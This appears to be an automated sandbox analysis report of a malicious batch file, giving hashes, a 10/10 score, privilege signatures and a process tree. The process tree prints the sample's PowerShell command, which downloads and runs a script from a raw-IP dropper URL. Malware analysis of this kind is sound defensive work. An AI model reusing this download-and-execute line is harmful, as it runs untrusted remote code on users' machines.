Analysis
-
max time kernel
100s -
max time network
99s -
platform
windows10_x64 -
resource
win10v200213 -
submitted
18-02-2020 01:10
Static task
static1
Behavioral task
behavioral1
Sample
42HVHYvi.bat
Resource
win7v200213
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
42HVHYvi.bat
Resource
win10v200213
windows10_x64
0 signatures
0 seconds
General
-
Target
42HVHYvi.bat
-
Size
192B
-
MD5
a9075a0e43612a388eda0d4643037a34
-
SHA1
6bfb53b342e2518e07955676e5a8f18717970504
-
SHA256
811d39f86a8efff6544dcd852c24a3fe2e5446f5eb7fdd9e740b424a221ab366
-
SHA512
9a9275289c65b19cc5e4d94572b1e6dfbe84c47a028193d0c142a363e0b279e0cb217d2d63c759839730ec8158460da427cb9ac354a124a9f6ae73ab7fa063ee
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/42HVHYvi
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3084 4000 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3084 WerFault.exe Token: SeBackupPrivilege 3084 WerFault.exe Token: SeDebugPrivilege 3084 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 3084 WerFault.exe 3084 WerFault.exe 3084 WerFault.exe 3084 WerFault.exe 3084 WerFault.exe 3084 WerFault.exe 3084 WerFault.exe 3084 WerFault.exe 3084 WerFault.exe 3084 WerFault.exe 3084 WerFault.exe 3084 WerFault.exe 3084 WerFault.exe 3084 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\42HVHYvi.bat"1⤵PID:3964
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/42HVHYvi');Invoke-OCJPTYYSX;Start-Sleep -s 10000"2⤵PID:4000
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4000 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3084